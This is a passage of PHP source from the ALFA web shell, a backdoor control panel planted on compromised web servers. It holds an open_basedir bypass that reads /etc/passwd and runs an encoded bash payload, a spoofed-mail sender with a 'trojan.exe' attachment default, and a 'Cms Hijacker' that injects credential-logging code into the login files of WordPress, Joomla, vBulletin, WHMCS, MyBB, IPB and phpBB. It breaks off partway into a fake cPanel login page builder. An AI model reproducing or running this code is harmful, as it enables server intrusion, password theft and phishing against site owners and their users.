alfabasedir(){\r\nalfahead();\r\necho \'<div class=header>\r\n<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>\';\r\n$passwd = _alfa_file(\'/etc/passwd\');\r\nif(is_array($passwd)){\r\n$users = array();\r\n$makepwd = alfaMakePwd();\r\n$basedir = @ini_get(\'open_basedir\');\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){\r\n$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";\r\n$tmp_path = alfaWriteTocgiapi("basedir.alfa",$bash);\r\n$bash_users  = alfaEx("cd ".$tmp_path."/alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);\r\n$users = json_decode($bash_users, true);\r\n$x=count($users);\r\nif($x>=2){array_pop($users);--$x;}\r\n}\r\nif(!$basedir&&!$safe_mode){\r\n$x=0;\r\nforeach($passwd as $str){\r\n$pos = strpos($str,\':\');\r\n$username = substr($str,0,$pos);\r\n$dirz = str_replace("{user}", $username, $makepwd);\r\nif(($username != \'\')){\r\nif (@is_readable($dirz)){\r\narray_push($users,$username);\r\n$x++;\r\n}}}\r\n}\r\necho \'<br><br>\';\r\necho "<b><font color=\\"#00A220\\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\\n"."<br /></font></b>";\r\necho "<b><font color=\\"#FFFFFF\\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\\n"."<br /></font></b>";\r\necho "<b><font color=\\"#FF0000\\">[~] Searching for passwords in config files...\\n\\n"."<br /><br /><br /></font></b>";\r\nforeach($users as $user){\r\nif(empty($user))continue;\r\n$path = str_replace("{user}", $user, $makepwd);\r\necho "<form method=post onsubmit=\'g(\\"FilesMan\\",this.c.value,\\"\\");return false;\'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class=\'foottable\' type=text name=c value=\'$path\'><input type=submit value=\'>>\'></form><br>";\r\n}\r\n}else{echo(\'<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>\');}\r\necho \'<br><br></b>\';\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfamail(){\r\nalfahead();\r\necho \'<div class=header>\';\r\nAlfaNum(8,9,10);\r\necho \'<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\\\'mail\\\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\\\'>>\\\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">\';\r\n$table = array(\r\n\'td1\' => array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mail To : \', \'inputName\' => \'mail_to\', \'inputValue\' => \'target@fbi.gov\', \'inputSize\' => \'60\',\'placeholder\' => true),\r\n\'td2\' => array(\'color\' => \'FFFFFF\', \'tdName\' => \'From : \', \'inputName\' => \'mail_from\', \'inputValue\' => \'sec@google.com\', \'inputSize\' => \'60\', \'placeholder\' => true),\r\n\'td3\' => array(\'color\' => \'FFFFFF\', \'tdName\' => \'Subject : \', \'inputName\' => \'mail_subject\', \'inputValue\' => \'your site hacked by me\', \'inputSize\' => \'60\'),\r\n\'td4\' => array(\'color\' => \'FFFFFF\', \'tdName\' => \'Attach File : \', \'inputName\' => \'mail_attach\', \'inputValue\' => $GLOBALS[\'cwd\'].\'trojan.exe\', \'inputSize\' => \'60\'),\r\n\'td5\' => array(\'color\' => \'FFFFFF\', \'tdName\' => \'Count Mail : \', \'inputName\' => \'count_mail\', \'inputValue\' => \'1\', \'inputSize\' => \'60\')\r\n);\r\ncreate_table($table);\r\necho \'<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>\';\r\nif(isset($_POST[\'alfa4\'])&&($_POST[\'alfa4\'] == \'>>\')){\r\n$mail_to = $_POST[\'alfa1\'];\r\n$mail_from = $_POST[\'alfa2\'];\r\n$mail_subject = $_POST[\'alfa3\'];\r\n$mail_content = $_POST[\'alfa5\'];\r\n$count_mail = (int)$_POST[\'alfa6\'];\r\n$mail_attach = $_POST[\'alfa7\'];\r\nif(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){\r\nif(!empty($mail_attach)&&@is_file($mail_attach)){\r\n$file = $mail_attach;\r\n$content = __read_file($file);\r\n$content = chunk_split(__ZW5jb2Rlcg($content));\r\n$uid = md5(uniqid(time()));\r\n$filename = basename($file);\r\n$headers  = "From: ".$mail_from." <".$mail_from.">\\r\\n";\r\n$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \\r\\n";\r\n$headers .= "Reply-To: ".$mail_from."\\r\\n";\r\n$headers .= "Content-Type: multipart/mixed; boundary=\\"".$uid."\\"\\r\\n\\r\\n";\r\n$headers .= \'MIME-Version: 1.0\' . "\\r\\n";\r\n$headers .= \'X-Mailer: php\' . "\\r\\n";\r\n$mail_content  = "--".$uid."\\r\\n";\r\n$mail_content .= "Content-type:text/plain; charset=iso-8859-1\\r\\n";\r\n$mail_content .= "Content-Transfer-Encoding: 7bit\\r\\n\\r\\n";\r\n$mail_content .= $mail_content."\\r\\n\\r\\n";\r\n$mail_content .= "--".$uid."\\r\\n";\r\n$mail_content .= "Content-Type: application/octet-stream; name=\\"".$filename."\\"\\r\\n";\r\n$mail_content .= "Content-Transfer-Encoding: base64\\r\\n";\r\n$mail_content .= "Content-Disposition: attachment; filename=\\"".$filename."\\"\\r\\n\\r\\n";\r\n$mail_content .= $content."\\r\\n\\r\\n";\r\n$mail_content .= "--".$uid."--";\r\n}else{\r\n$headers  = "From: " . $mail_from. " ( ".$mail_from." ) \\r\\n";\r\n$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \\r\\n";\r\n$headers .= \'Reply-To: \'.$mail_from.\'\' . "\\r\\n";\r\n$headers .= \'Content-type: text/html; charset=utf-8\' . "\\r\\n";\r\n$headers .= \'MIME-Version: 1.0\' . "\\r\\n";\r\n$headers .= \'X-Mailer: php\' . "\\r\\n";\r\n}\r\nif(empty($count_mail)||$count_mail<1)$count_mail=1;\r\nif(!empty($mail_from)){echo __pre();\r\nfor($i=1;$i<=$count_mail;$i++){\r\nif(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");\r\n}}else{__alert("Invalid Mail From !");}\r\n}else{__alert("Invalid Mail To !");}\r\n}\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction alfaziper(){\r\nalfahead();\r\nAlfaNum(8,9,10);\r\necho \'<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>\r\n<form onSubmit="g(\\\'ziper\\\',null,null,null,this.dirzip.value,this.zipfile.value,\\\'>>\\\');return false;" method="post">\r\n<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="\'.(!empty($_POST[\'alfa3\'])?htmlspecialchars($_POST[\'alfa3\']):htmlspecialchars($GLOBALS[\'cwd\'])).\'" size="60"/>\r\n<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="\'.$GLOBALS[\'cwd\'].\'alfa.zip" size="60"/>\r\n<input type="submit" value=" " name="ziper" />\r\n</form></center></p>\';\r\nif(isset($_POST[\'alfa5\']) && ($_POST[\'alfa5\'] == \'>>\')){\r\n$dirzip = $_POST[\'alfa3\'];\r\n$zipfile = $_POST[\'alfa4\'];\r\nif($GLOBALS[\'sys\']!=\'unix\'&&_alfa_can_runCommand(true,true)){\r\nalfaEx("powershell Compress-Archive -Path \'".addslashes($dirzip)."\' -DestinationPath \'".addslashes(basename($zipfile))."\'");\r\necho __pre().\'<center><p>Done -> <b><font color="green">\'.$zipfile.\'</font></b></p></center>\';\r\n}elseif($GLOBALS[\'sys\']==\'unix\'&&_alfa_can_runCommand(true,true)){\r\nalfaEx("cd \'".addslashes(dirname($zipfile))."\';zip -r \'".addslashes(basename($zipfile))."\' \'".addslashes($dirzip)."\'");\r\necho __pre().\'<center><p>Done -> <b><font color="green">\'.$zipfile.\'</font></b></p></center>\';\r\n}elseif(class_exists(\'ZipArchive\')){\r\nif(__alfaziper($dirzip, $zipfile)){\r\necho __pre().\'<center><p><font color="green">Success...!<br>\'.$zipfile.\'</font></p></center>\';\r\n}else{echo __pre().\'<center><p><font color="red">ERROR!!!...</font></p></center>\';}\r\n}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction __alfaziper($source,$destination){\r\n\tif(!extension_loaded(\'zip\')||!file_exists($source)){\r\n\t\treturn false;\r\n\t}\r\n\t$zip=new ZipArchive();\r\n\tif(!$zip->open($destination,ZIPARCHIVE::CREATE)){\r\n\t\treturn false;\r\n\t}\r\n\t$source=str_replace(\'\\\\\',\'/\',realpath($source));\r\n\tif(is_dir($source)===true){\r\n\t\t$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);\r\n\t\tforeach($files as $file){\r\n\t\t\t$file=str_replace(\'\\\\\',\'/\',$file);\r\n\t\t\tif(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;\r\n\t\t\t$file=realpath($file);\r\n\t\t\tif(is_dir($file)===true){\r\n\t\t\t\t$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));\r\n\t\t\t}else if(is_file($file)===true){\r\n\t\t\t\t$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));\r\n\t\t\t}\r\n\t\t}\r\n\t}else if(is_file($source)===true){\r\n\t\t$zip->addFromString(basename($source),file_get_contents($source));\r\n\t}\r\n\treturn $zip->close();\r\n}\r\nfunction alfadeziper(){\r\nalfahead();\r\nAlfaNum(8,9,10);\r\necho \'<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>\r\n<form onSubmit="g(\\\'deziper\\\',null,null,null,this.dirzip.value,this.zipfile.value,\\\'>>\\\');return false;" method="post">\r\n<div class="txtfont">File: </div> <input type="text" name="dirzip" value="\'.(!empty($_POST[\'alfa3\'])?htmlspecialchars($_POST[\'alfa3\']):htmlspecialchars($GLOBALS[\'cwd\'])).\'" size="60"/>\r\n<div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="\'.$GLOBALS[\'cwd\'].\'" size="60"/>\r\n<input type="submit" value=" " name="ziper" />\r\n</form></center></p>\';\r\nif(isset($_POST[\'alfa5\']) && ($_POST[\'alfa5\'] == \'>>\')){\r\n$dirzip = $_POST[\'alfa3\'];\r\n$zipfile = $_POST[\'alfa4\'];\r\nif(@!is_dir($zipfile)){\r\n\t@mkdir($zipfile, 0777, true);\r\n}\r\n$finfo = "";\r\n$file_type = "";\r\nif(function_exists(\'finfo_open\')){\r\n$finfo = @finfo_open(FILEINFO_MIME_TYPE);\r\n$file_type = @finfo_file($finfo, $dirzip);\r\n@finfo_close($finfo);\r\n}else{\r\n\tif($GLOBALS[\'sys\']==\'unix\'&&_alfa_can_runCommand(true,true)){\r\n\t\t$file_type = alfaEx(\'file -b --mime-type \' . $dirzip);\r\n\t}\r\n}\r\nif($GLOBALS[\'sys\']!=\'unix\'&&_alfa_can_runCommand(true,true)){\r\nalfaEx("powershell expand-archive -path \'".addslashes($dirzip)."\' -destinationpath \'".addslashes(basename($zipfile))."\'");\r\necho __pre().\'<center><p>Done -> <b><font color="green">\'.$zipfile.\'</font></b></p></center>\';\r\n}elseif($GLOBALS[\'sys\']==\'unix\'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx(\'which unzip\')) > 0||strlen(alfaEx(\'which tar\')) > 0||strlen(alfaEx(\'which gunzip\')) > 0)){\r\nswitch ($file_type) {\r\n\tcase \'application/zip\':\r\n\t\talfaEx("cd \'".addslashes($zipfile)."\';unzip \'".addslashes($dirzip)."\'");\r\n\tbreak;\r\n\tcase \'application/x-tar\': case \'application/x-gzip\': case \'application/x-gtar\':\r\n\t\tif(strstr(basename($dirzip), ".tar.gz")||strstr(basename($dirzip), ".tar")){\r\n\t\t\talfaEx("cd \'".addslashes($zipfile)."\';tar xzf \'".addslashes($dirzip)."\'");\r\n\t\t}else{\r\n\t\t\talfaEx("cd \'".addslashes($zipfile)."\';gunzip \'".addslashes($dirzip)."\'");\r\n\t\t}\r\n\tbreak;\r\n}\r\necho __pre().\'<center><p>Done -> <b><font color="green">\'.$zipfile.\'</font> <a style="cursor:pointer;" onclick="g(\\\'FilesMan\\\',\\\'\'.$zipfile.\'\\\');">[ View Folder ]</a></b></p></center>\';\r\n}elseif(class_exists(\'ZipArchive\')){\r\n\t$itsok = false;\r\n\tif(emtpy($file_type)){\r\n\t\t$file_type = "application/zip";\r\n\t}\r\n\tswitch ($file_type) {\r\n\t\tcase \'application/zip\':\r\n\t\t\t$zip = new ZipArchive;\r\n\t\t\t$res = $zip->open($dirzip);\r\n\t\t\tif ($res) {\r\n\t\t\t\t$zip->extractTo($zipfile);\r\n\t\t\t\t$zip->close();\r\n\t\t\t\t$itsok = true;\r\n\t\t\t}\r\n\t\tbreak;\r\n\t\tcase \'application/x-tar\': case \'application/x-gzip\': case \'application/x-gtar\':\r\n\t\t\tif(strstr(basename($dirzip), ".tar.gz")){\r\n\t\t\t\t$new_file = $zipfile .\'/\'. basename($dirzip);\r\n\t\t\t\t@copy($dirzip, $new_file);\r\n\t\t\t\t$new_tar = str_replace(".tar.gz", ".tar", $new_file);\r\n\t\t\t\ttry {\r\n\t\t\t\t\t$p = new PharData($new_file);\r\n\t\t\t\t\t$p->decompress();\r\n\t\t\t\t\t$phar = new PharData($new_tar);\r\n\t\t\t\t\t$phar->extractTo($zipfile);\r\n\t\t\t\t\t@unlink($new_file);\r\n\t\t\t\t\t@unlink($new_tar);\r\n\t\t\t\t\t$itsok = true;\r\n\t\t\t\t} catch (Exception $e) {\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\ttry {\r\n\t\t\t\t\t$phar = new PharData($dirzip);\r\n\t\t\t\t\t$phar->extractTo($zipfile);\r\n\t\t\t\t\t$itsok = true;\r\n\t\t\t\t} catch (Exception $e) {\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tbreak;\r\n\t}\r\nif($itsok){\r\necho __pre().\'<center><p><font color="green">Success...!<br>\'.$zipfile.\'</font> <a style="cursor:pointer;" onclick="g(\\\'FilesMan\\\',\\\'\'.$zipfile.\'\\\');">[ View Folder ]</a></p></center>\';\r\n}else{echo __pre().\'<center><p><font color="red">ERROR!!!...</font></p></center>\';}\r\n}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfacmshijacker(){\r\nalfahead();\r\nAlfaNum(5,6,7,8,9,10);\r\necho \'<div class=header><br>\r\n<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\\\'cmshijacker\\\',null,this.cmshi.value,this.saveto.value,\\\'>>\\\',this.cmspath.value);return false;" method=\\\'post\\\'>\r\n<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">\';\r\n$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");\r\nforeach($cm_array as $key=>$val)echo \'<option value="\'.$key.\'">\'.$val.\'</option>\';\r\necho("</select>");\r\necho \' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">\r\nSaveTo: <input size="50" type="text" name="saveto" value="\'.$GLOBALS[\'cwd\'].\'alfa.txt"></font>\r\n<input type="submit" name="btn" value=" "></form></center><br>\';\r\n$cms = $_POST[\'alfa1\'];\r\n$saveto = $_POST[\'alfa2\'];\r\n$cmspath = $_POST[\'alfa4\'];\r\nif(!empty($cms) AND !empty($saveto) AND $_POST[\'alfa4\'] AND $_POST[\'alfa3\'] == \'>>\'){\r\necho __pre();\r\nalfaHijackCms($cms,$cmspath,$saveto);\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfaHijackCms($cms,$cmspath,$saveto){\r\nswitch($cms){\r\ncase "vb":\r\nhijackvBulletin($cmspath,$saveto);\r\nbreak;\r\ncase "wp":\r\nhijackwp($cmspath,$saveto);\r\nbreak;\r\ncase "jom":\r\nhijackJoomla($cmspath,$saveto);\r\nbreak;\r\ncase "whmcs":\r\nhijackWhmcs($cmspath,$saveto);\r\nbreak;\r\ncase "mybb":\r\nhijackMybb($cmspath,$saveto);\r\nbreak;\r\ncase "ipb":\r\nhijackIPB($cmspath,$saveto);\r\nbreak;\r\ncase "phpbb":\r\nhijackPHPBB($cmspath,$saveto);\r\nbreak;\r\ndefault:\r\necho "error!";\r\nbreak;\r\n}\r\n}\r\nfunction hijackvBulletin($path,$saveto){\r\n$code=\'$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\\\'" . $alfa_username . "\\\'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \\\' : \\\' .  $alfa_password." (" . $row["email"] . ")\\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}\';\r\n$clearpw = \'defined(\\\'DISABLE_PASSWORD_CLEARING\\\')\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$login = $path."/login.php";\r\n$class = $path."/includes/class_bootstrap.php";\r\n$dologin = \'do_login_redirect();\';\r\n$evil_login = "\\t".$code."\\n\\t".$dologin;\r\n$evil_class = "true";\r\nif((@is_file($login) AND @is_writable($login)) || (@is_file($class) AND @is_writable($class))){\r\n$data_login = @file_get_contents($login);\r\n$data_class = @file_get_contents($class);\r\nif(strstr($data_login, $dologin) || strstr($data_class, $clearpw)){\r\n$login_replace = str_replace($dologin,$evil_login, $data_login);\r\n$class_replace = str_replace($clearpw,$evil_class, $data_class);\r\n@file_put_contents($login, $login_replace);\r\n@file_put_contents($class, $class_replace);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackwp($path,$saveto){\r\n$code = \'$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\\\'log\\\']." : ".$_POST[\\\'pwd\\\']." (".($user->user_email).")\\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);\';\r\n$redirect_wp = \'#if[ ]{0,}\\([ ]{0,}![ ]{0,}is_wp_error\\([ ]{0,}\\$user[ ]{0,}\\)[ ]{0,}&&[ ]{0,}![ ]{0,}\\$reauth[ ]{0,}\\)[ ]{0,}{#\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$login=$path."/wp-login.php";\r\nif(@is_file($login) AND @is_writable($login)){\r\n$data_login = @file_get_contents($login);\r\nif(@preg_match($redirect_wp, $data_login, $match)){\r\n$evil_login = "\\t".$match[0]."\\n\\t".$code;\r\n$login_replace = @preg_replace($redirect_wp,$evil_login, $data_login);\r\n@file_put_contents($login, $login_replace);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackJoomla($path,$saveto){\r\n$code = \'<?php jimport(\\\'joomla.user.authentication\\\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\\\'username\\\'=>$_POST[\\\'username\\\'],\\\'password\\\'=>$_POST[\\\'passwd\\\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\\\'passwd\\\']." ( ".$Alfa_response->email." )\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$comp=$path."/administrator/components/com_login/";\r\nif(@is_file($comp."/login.php")){\r\n$login = $comp."/login.php";\r\n}elseif(@is_file($comp."/admin.login.php")){\r\n$login = $comp."/admin.login.php";\r\n}else{\r\n$login = \'\';\r\n}\r\nif(@is_file($login) AND @is_writable($login) AND $login != \'\'){\r\n$data_login = @file_get_contents($login);\r\n$evil_login = $code."\\n".$data_login;\r\n@file_put_contents($login, $evil_login);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackWhmcs($path,$saveto){\r\n$code = \'<?php if(isset($_POST[\\\'username\\\']) AND isset($_POST[\\\'password\\\']) AND !empty($_POST[\\\'username\\\']) AND !empty($_POST[\\\'password\\\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\\\'username\\\'];$alfa_pw = @$_POST[\\\'password\\\'];if(isset($_POST[\\\'language\\\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \\\'$alfa_uname\\\' AND `password` = \\\'".md5($alfa_pw)."\\\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \\\'$alfa_uname\\\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\\\':\\\', $row[\\\'password\\\']);$__encPW = md5($__salt[1].$_POST[\\\'password\\\']).\\\':\\\'.$__salt[1];if($row[\\\'password\\\'] == $__encPW){$allow = true;$row[\\\'username\\\'] = $row[\\\'email\\\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\\\'username\\\'] . \\\' : \\\' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? \\\'is_admin\\\' : \\\'is_user\\\')."\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$conf=$path."/configuration.php";\r\nif(@is_file($conf) AND @is_writable($conf)){\r\n$data_conf = @file_get_contents($conf);\r\nif(!strstr($data_conf,\'?>\'))$code = \'?>\'.$code;\r\n$evil_conf = $data_conf."\\n".$code;\r\n@file_put_contents($conf, $evil_conf);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackMybb($path,$saveto){\r\n$code = \'$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \\\'".$user[\\\'username\\\']."\\\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\\\'username\\\']." : ". $user[\\\'password\\\']." ( ".$alfa_fetch[\\\'email\\\']." )\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);\';\r\n$find = \'$loginhandler->complete_login();\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$login=$path."/member.php";\r\n$evil_login = "\\t".$code."\\n\\t".$find;\r\nif(@is_file($login) AND @is_writable($login)){\r\n$data_login = @file_get_contents($login);\r\nif(strstr($data_login, $find)){\r\n$login_replace = str_replace($find,$evil_login, $data_login);\r\n@file_put_contents($login, $login_replace);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackIPB($path,$saveto){\r\n$code = \'$Alfa_q = $this->DB->buildAndFetch(array(\\\'select\\\' => \\\'email\\\', \\\'from\\\' => \\\'members\\\', \\\'where\\\' => \\\'name="\\\'.$username.\\\'" OR email="\\\'.$email.\\\'"\\\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\\\'ips_username\\\'].\\\' : \\\'.$_POST[\\\'ips_password\\\'].\\\' ( \\\'.$Alfa_q[\\\'email\\\'].\\\' )\\\'."\\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);\';\r\n$find = \'unset( $member[\\\'plainPassword\\\'] );\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$login=$path."/admin/sources/handlers/han_login.php";\r\n$evil_login = "\\t".$find."\\n\\t".$code;\r\nif(@is_file($login) AND @is_writable($login)){\r\n$data_login = @file_get_contents($login);\r\nif(strstr($data_login, $find)){\r\n$login_replace = str_replace($find,$evil_login, $data_login);\r\n@file_put_contents($login, $login_replace);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackPHPBB($path,$saveto){\r\n$code = \'$Alfa_u = request_var(\\\'username\\\', \\\'\\\');$Alfa_p = request_var(\\\'password\\\', \\\'\\\');if($Alfa_u != \\\'\\\' AND $Alfa_p != \\\'\\\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\\\'status\\\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\\\'user_row\\\'][\\\'user_email\\\']." )\\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}\';\r\n$find = \'case \\\'login\\\':\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$login=$path."/ucp.php";\r\n$evil_login = "\\t".$find."\\n\\t".$code;\r\nif(@is_file($login) AND @is_writable($login)){\r\n$data_login = @file_get_contents($login);\r\nif(strstr($data_login, $find)){\r\n$login_replace = str_replace($find,$evil_login, $data_login);\r\n@file_put_contents($login, $login_replace);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackOutput($c=0,$p=\'\'){echo($c==0?"<center><font color=\'green\'>Success</font> --> path: $p</center>":\'<center><font color="red">Error in inject code !</font></center>\');}\r\nfunction Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){\r\nif(@is_dir($dir)){\r\n$files=@scandir($dir);\r\nforeach($files as $key => $value){\r\n$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);\r\nif(!@is_dir($path)){\r\nif($ext!=\'*\'){$f = basename($path);$f = explode(\'.\',$f);$f = end($f);if($f!=$ext)continue;}\r\nif($e==\'str\'){\r\n$content = @file_get_contents($path);\r\nif(strpos($content, $string) !== false){\r\necho str_replace(\'\\\\\',\'/\',$path) . "<br>";\r\n}\r\n}else{\r\nif(strstr($value,$string)){\r\necho str_replace(\'\\\\\',\'/\',$path) . "<br>";\r\n}\r\n}\r\n$results[] = $path;\r\n}elseif($value != "." && $value != "..") {\r\nAlfa_StrSearcher($path,$string,$ext,$e,$results);\r\n$results[] = $path;\r\n}}}}\r\nfunction alfafakepage(){\r\n\talfahead();\r\n\tAlfaNum(9,10);\r\n\techo \'<div class=header><br>\r\n\t<center><div class="txtfont_header">| Host Manager Fake page |</div></center><br><br><form onSubmit="g(\\\'fakepage\\\',null,this.clone_page.value,this.fake_root.value,\\\'>>\\\',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;" method=\\\'post\\\'>\r\n\t<div class="txtfont" style="position: relative;left: 50%;transform: translate(-50%);"><div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Panel: </span><select style="width:100px;" name="panel">\';\r\n\t$cm_array = array("cpanel"=>"Cpanel","directadmin"=>"DirectAdmin");\r\n\tforeach($cm_array as $key=>$val)echo \'<option value="\'.$key.\'">\'.$val.\'</option>\';\r\n\techo("</select></div>");\r\n\techo \'<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Clone page: </span><input size="50" type="text" name="clone_page" placeholder="eg: https://target.com:2083 | https://target.com:2222"></div>\r\n\t<div style="margin-bottom:6px;"><span>Fake page root: </span><input size="50" type="text" name="fake_root" value="\'.$_SERVER["DOCUMENT_ROOT"].\'/fake_page_root/"></div>\r\n\t<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Inject to: </span><input size="50" type="text" name="inject_to" value="\'.$_SERVER["DOCUMENT_ROOT"].\'/index.php"></div>\r\n\t<div style="margin-bottom:6px;"><span style="display: 